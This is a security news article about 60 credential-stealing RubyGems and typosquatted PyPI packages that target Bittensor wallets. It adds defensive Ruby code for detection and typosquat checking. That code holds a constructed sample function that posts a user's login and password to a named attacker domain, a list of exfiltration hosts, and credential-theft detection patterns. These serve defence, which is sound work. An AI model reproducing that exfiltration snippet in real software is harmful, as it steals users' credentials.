Malicious Packages Target RubyGems and PyPI: Stealing Credentials and Crypto, Leading to Security Overhaul


Security firm Socket has identified a set of 60 malicious packages (gems) in the RubyGems ecosystem. The gems masquerade as harmless automation tools for social media, blogging, and messaging platforms, but their real purpose is to steal users' credentials. The campaign has been running since at least March 2023, and the gems have been downloaded more than 275,000 times in total.

That download count does not map directly to the number of compromised systems: not every download results in the gem being executed, and a single machine may account for several downloads.

The malicious gems, published under the aliases zon, nowon, kwonsoonje, and soonje, claimed to offer bulk posting and engagement features for platforms such as Instagram, Twitter/X, TikTok, WordPress, Telegram, Kakao, and Naver. The gems do perform the advertised functions, which is what makes them convincing, but they also contain hidden code that exfiltrates the username and password the user types in to a server controlled by the attacker. The credentials are collected through a simple graphical login form that looks like a normal part of the tool.

Some of the malicious gems, such as njongto_duo and jongmogtolon, stand out for targeting financial discussion platforms. These libraries were marketed as tools to flood investment forums with ticker symbols, stock narratives, and synthetic engagement in an attempt to manipulate public perception and increase visibility.

The servers receiving the stolen information include programzon[.]com, appspace[.]kr, and marketingduo[.]co[.]kr, which have been found to advertise bulk messaging services, phone number scraping, and automated social media tools.
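A gem that keeps its advertised behaviour while quietly posting login details elsewhere will not be caught by running it and watching whether it "works". The following is an added example (written for this article, not code from Socket or from the gems themselves) of a minimal static triage pass over a gem's Ruby source: it flags the exfiltration hosts listed above, common outbound-network sinks, and lines that send credential-shaped fields. The sample source at the bottom is constructed for the example, and the sink and credential patterns are assumed heuristics, not a complete list.

```ruby
# Added example: static triage of Ruby source for credential exfiltration.
# Not code from the article, from Socket, or from the malicious gems.

# Exfiltration hosts named in the article, kept defanged in the constant and
# re-fanged only for matching so the list itself is safe to copy around.
EXFIL_HOSTS_DEFANGED = ['programzon[.]com', 'appspace[.]kr', 'marketingduo[.]co[.]kr'].freeze
EXFIL_HOSTS = EXFIL_HOSTS_DEFANGED.map { |h| h.gsub('[.]', '.') }.freeze

# Assumed heuristics: outbound network sinks and credential-shaped names.
NETWORK_SINKS = /\b(Net::HTTP|open-uri|URI\.open|Faraday|HTTParty|TCPSocket)\b/
CRED_PATTERN  = /\b(password|passwd|username|login|credential)\b/i
SEND_PATTERN  = /post|form_data|body|params/i

Finding = Struct.new(:file, :line, :kind, :text)

# Scan one source file's text; returns an array of Finding structs.
def scan_source(text, file = '<string>')
  findings = []
  text.each_line.with_index(1) do |line, n|
    stripped = line.strip
    if EXFIL_HOSTS.any? { |h| line.include?(h) }
      findings << Finding.new(file, n, :known_exfil_host, stripped)
    end
    findings << Finding.new(file, n, :network_sink, stripped) if line =~ NETWORK_SINKS
    if line =~ CRED_PATTERN && line =~ SEND_PATTERN
      findings << Finding.new(file, n, :credential_post, stripped)
    end
  end
  findings
end

# Scan every .rb file under an unpacked gem directory (e.g. `gem unpack foo.gem`).
def scan_gem_dir(dir)
  Dir.glob(File.join(dir, '**', '*.rb')).flat_map { |f| scan_source(File.read(f), f) }
end

# Collapse findings into a verdict: a known exfil host is decisive on its own;
# a network sink plus a credential send on the same scan is worth a human look.
def verdict(findings)
  kinds = findings.map(&:kind).uniq
  return :known_malicious if kinds.include?(:known_exfil_host)
  return :suspicious if kinds.include?(:network_sink) && kinds.include?(:credential_post)
  :clean
end

# Constructed sample source shaped like the behaviour described in the article.
SAMPLE_MALICIOUS = <<~RUBY
  require 'net/http'
  def login(user, pw)
    uri = URI('https://programzon.com/api/login')
    Net::HTTP.post_form(uri, 'username' => user, 'password' => pw)
  end
RUBY

SAMPLE_BENIGN = "def add(a, b)\n  a + b\nend\n"

if __FILE__ == $PROGRAM_NAME
  scan_source(SAMPLE_MALICIOUS, 'sample.rb').each do |f|
    puts "#{f.file}:#{f.line} #{f.kind} #{f.text}"
  end
  puts "verdict: #{verdict(scan_source(SAMPLE_MALICIOUS))}"
end
```

Run it against an unpacked gem with `scan_gem_dir('path/to/unpacked')`; the host list is the only part that is campaign-specific, and a `:suspicious` verdict on a gem whose README never mentions a server of its own is the signal worth chasing.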

Victims of this campaign are likely to be grey-hat marketers who rely on such automation tools for spamming, SEO, and engagement campaigns designed to artificially boost visibility.

“Each gem acts as an infostealer targeting Windows systems, with a primary focus on South Korean users. This is evidenced by the Korean-language UIs and data exfiltration to .kr domains,” noted Socket. “The campaign has evolved across multiple aliases and infrastructure waves, indicating a highly persistent and sophisticated operation.”

“By embedding credential-stealing functionality within gems marketed to grey-hat users seeking automation tools, the attackers secretly capture sensitive data while blending in with seemingly legitimate activities.”

This development comes on the heels of GitLab's discovery of several typosquatting packages on the Python Package Index (PyPI). These packages are designed to steal cryptocurrency from Bittensor wallets by hijacking legitimate staking functions. The malicious packages, which mimic the legitimate bittensor and bittensor-cli libraries, are:

  • bitensor (versions 9.9.4 and 9.9.5)
  • bittenso-cli
  • qbittensor
  • bittenso
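All four names above are a single edit away from a real package: one letter dropped, one letter added. That is cheap to check before a dependency is installed, and the check is the same whatever the ecosystem. The following is an added example (not GitLab's or PyPI's code) that compares requested package names against a known-good list using Levenshtein distance and flags near-misses; the known-good list and the candidate names are constructed for the example, and the threshold of two edits is an assumption to tune per project.

```ruby
# Added example: flag dependency names that are a small edit distance away
# from a package you actually intend to use. Not code from GitLab or PyPI.

# Constructed allowlist for this example; in practice this is your lockfile.
KNOWN_GOOD = %w[bittensor bittensor-cli requests numpy].freeze

# Levenshtein distance: insertions, deletions and substitutions at unit cost.
def edit_distance(a, b)
  prev = (0..b.length).to_a
  a.each_char.with_index(1) do |ca, i|
    cur = [i]
    b.each_char.with_index(1) do |cb, j|
      cost = ca == cb ? 0 : 1
      cur << [prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost].min
    end
    prev = cur
  end
  prev[b.length]
end

# Returns [name, closest_known, distance] for every requested name that is
# not an exact allowlist match but sits within `threshold` edits of one.
def typosquat_candidates(names, known = KNOWN_GOOD, threshold: 2)
  names.reject { |n| known.include?(n) }.filter_map do |n|
    best = known.map { |k| [k, edit_distance(n, k)] }.min_by(&:last)
    [n, *best] if best.last <= threshold
  end
end

if __FILE__ == $PROGRAM_NAME
  # The four lookalike names from the article plus two controls.
  requested = %w[bitensor bittenso-cli qbittensor bittenso requests flask]
  typosquat_candidates(requested).each do |name, near, dist|
    puts "#{name}: #{dist} edit(s) from #{near}, refuse to install"
  end
end
```

A distance of one or two against a popular name is almost never a coincidence; the same routine works on a requirements.txt or Gemfile line by line, and exact allowlist matches pass straight through so the check stays quiet on a clean dependency set.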

“The attackers seem to have specifically targeted staking operations, likely for calculated reasons,” said GitLab’s Vulnerability Research team. “By hiding malicious code within seemingly legitimate staking functions, they exploited both the technical details and psychological factors associated with routine blockchain operations.”

By FirstHackersNews | August 8th, 2025 | cyberattack, Cybersecurity, Malware

About the Author:

FirstHackersNews - Identifies Security
